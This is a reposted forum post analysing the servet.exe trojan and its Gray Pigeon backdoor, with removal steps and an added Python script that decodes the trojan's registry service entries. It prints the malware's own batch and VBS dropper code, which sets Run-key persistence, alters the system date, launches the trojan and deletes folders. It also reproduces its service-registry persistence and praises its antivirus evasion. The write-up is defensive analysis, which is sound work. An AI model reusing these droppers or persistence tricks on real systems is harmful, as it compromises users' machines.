鸿网互联 www.68idc.cn

Recommended: removing servet.exe

Source: Internet   Author: Anonymous   Time: 2018-02-10 16:35
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,72,00,76,00,65,\
  00,74,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="Windows InstallService"
"ObjectName"="LocalSystem"
"Description"="Windows InstallService"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\
  05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
  20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\
  00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\
  00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\
  00,01,01,00,00,00,00,00,05,12,00,00,00

It then uses svchost to make a reverse connection and downloads two trojans:

  %Systemroot%\system\11.exe    652604 bytes, the 黑防 build of Gray Pigeon (灰鸽子)
  %Systemroot%\system32\11.exe  719834 bytes, a small VB virus that seemingly can't even run (- -)

That VB virus drops:

  %Systemroot%\system32\11.bat  568 bytes

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v lype /t REG_EXPAND_SZ /d "%systemroot%\avp.exe" /f
set date=%date%
date 2000-01-01
@echo off setlocal enableextensions
echo WScript.Sleep 1000 %system%.\run$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %system%.\ run$.vbs
goto Timeout
goto End
:Next
%systemroot%\system\11.exe
copy %systemroot%\system\run.pif  %systemroot%\system32\
for %%f in (%system%.\run$.vbs*) do del %%f
date %date%
RD /S /Q %systemroot%\system\

  %Systemroot%\system\11.vbs  137 bytes

DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C  %systemroot%\system\11.bat", 0, TRUE)

Birds of a feather, really. But I did not see it drop avp.exe or run$.vbs, nor write the autorun entry. It did change the system date to 2000-01-01 though (careful, that alone will make things hang).

And that 652604-byte Gray Pigeon, sigh, I had to run it by hand myself (painful).

The 黑防 Gray Pigeon build is quite good: it has evasion applied and gets past Dr, BD, AVG, Ewido, McAfee, NOD32 and others on VirusTotal. It registers itself as a system service:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,73,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="smss"
"ObjectName"="LocalSystem"
"Description"="系统关键进程"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\
  05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
  20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\
  00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\
  00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\
  00,01,01,00,00,00,00,00,05,12,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Enum]
"0"="Root\\LEGACY_SMSS\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

It also uses hooking to hide its process. Ha, but SSM won't just "sit back and watch":

[screenshot]
It then makes a reverse connection (to get through the firewall); SSM intercepted it and I let it through. Waited a while and nothing happened. Ran out of patience (I've been irritable lately) and deleted it.

Removal method:

Download IceSword (冰刃) and SREng from [url]http://gudugengkekao.ys168.com/[/url]

  SREng.rar 597KB
  冰刃(增强版).rar 555KB

Close unnecessary processes and disconnect from the network.

1. Open IceSword and kill the IE and CMD processes you see, plus system.exe (the one under C:\Windows\), which is the Gray Pigeon. Because it is hidden by a hook, IceSword shows it in red; kill it too.

2. Use IceSword's "File" function to delete:

  C:\Windows\system\11.exe
  C:\Windows\system32\11.exe
  C:\Windows\system\11.bat
  C:\Windows\system\11.vbs
  C:\Windows\system32\servet.exe
  C:\Windows\systems.exe

3. Open SREng and delete:

  [Windows InstallService / WindowsDown][Stopped/Auto Start]
  C:\winnt\system32\servet.exe N/A
  [smss / smss][Running/Auto Start]
  C:\winnt\systems.exe N/A

OK, then change your QQ, mail and other passwords, reboot, and you're done.

Some screenshots:
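As an added example (not code from the original post or from any of the tools it mentions), the Python script below parses the two service keys dumped earlier (WindowsDown and smss), decodes their hex(2) ImagePath values (REG_EXPAND_SZ stored as UTF-16LE bytes) and the Type/Start DWORDs, and lists what a responder should notice before deleting the entries in step 3. The sample .reg text is copied from the post's own dump with the Security blobs left out; the flagging heuristics are my own assumptions, not rules defined by SREng or IceSword.

```python
"""Decode service-persistence entries from a .reg export (added example)."""
import re

# Well-known SCM constants from winnt.h / winsvc.h.
SERVICE_TYPE_FLAGS = {
    0x001: "SERVICE_KERNEL_DRIVER",
    0x002: "SERVICE_FILE_SYSTEM_DRIVER",
    0x010: "SERVICE_WIN32_OWN_PROCESS",
    0x020: "SERVICE_WIN32_SHARE_PROCESS",
    0x100: "SERVICE_INTERACTIVE_PROCESS",
}
START_TYPES = {0: "BOOT_START", 1: "SYSTEM_START", 2: "AUTO_START",
               3: "DEMAND_START", 4: "DISABLED"}
# Core Windows processes that are never installed as SCM services.
NEVER_A_SERVICE = {"smss", "csrss", "winlogon", "lsass", "wininit"}

# Constructed sample: the two service keys as dumped in the post (Security blob omitted).
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,72,00,76,00,65,\
  00,74,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="Windows InstallService"
"ObjectName"="LocalSystem"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss]
"Type"=dword:00000110
"Start"=dword:00000002
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,73,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="smss"
"ObjectName"="LocalSystem"
'''

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')


def _join_continuations(text):
    """Join .reg lines ending in a backslash into one logical line each."""
    lines, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith("\\"):
            buf += line[:-1]
        else:
            lines.append(buf + line)
            buf = ""
    return lines


def decode_value(data):
    """Decode one .reg value payload: quoted string, dword, or hex(N) byte list."""
    if data.startswith('"') and data.endswith('"'):
        return data[1:-1].replace("\\\\", "\\")
    if data.startswith("dword:"):
        return int(data[6:], 16)
    m = re.match(r"^hex(?:\((?P<t>[0-9a-fA-F]+)\))?:(?P<b>.*)$", data)
    if m:
        raw = bytes(int(b, 16) for b in m.group("b").split(",") if b)
        if m.group("t") in ("1", "2", "7"):  # REG_SZ / REG_EXPAND_SZ / REG_MULTI_SZ
            return raw.decode("utf-16-le").rstrip("\x00")
        return raw
    return data


def parse_reg(text):
    """Return {key_path: {value_name: decoded_value}} for a .reg export."""
    result, current = {}, None
    for line in _join_continuations(text):
        km = KEY_RE.match(line)
        if km:
            current = result.setdefault(km.group("key"), {})
            continue
        vm = VALUE_RE.match(line)
        if vm and current is not None:
            current[vm.group("name")] = decode_value(vm.group("data"))
    return result


def describe_services(reg):
    """Summarise each ...\\Services\\<name> key: image, type flags, start mode, account."""
    out = {}
    for key, vals in reg.items():
        m = re.search(r"\\Services\\([^\\]+)$", key, re.IGNORECASE)
        if not m or "ImagePath" not in vals:
            continue
        t = vals.get("Type", 0)
        out[m.group(1)] = {
            "image": vals["ImagePath"],
            "type": sorted(n for bit, n in SERVICE_TYPE_FLAGS.items() if t & bit),
            "start": START_TYPES.get(vals.get("Start"), "UNKNOWN"),
            "account": vals.get("ObjectName"),
        }
    return out


def flag_service(name, info):
    """Reasons (heuristics, not a verdict) why a service entry deserves a look."""
    reasons = []
    image = info["image"].strip('"').lower()
    if "SERVICE_INTERACTIVE_PROCESS" in info["type"]:
        reasons.append("interactive service type (0x100) is unusual for a real service")
    if not re.search(r"\\system32\\(drivers\\)?[^\\]+$", image):
        reasons.append("image outside system32 / system32\\drivers: " + info["image"])
    if name.lower() in NEVER_A_SERVICE:
        reasons.append("'%s' is a core process name, never a registered service" % name)
    return reasons


if __name__ == "__main__":
    for svc, info in describe_services(parse_reg(SAMPLE_REG)).items():
        print(svc, info)
        for r in flag_service(svc, info):
            print("   !", r)
```

Run it and the decoded paths are exactly the two binaries SREng shows in step 3, which is the check worth doing before trusting a display name like "Windows InstallService" or a service called "smss".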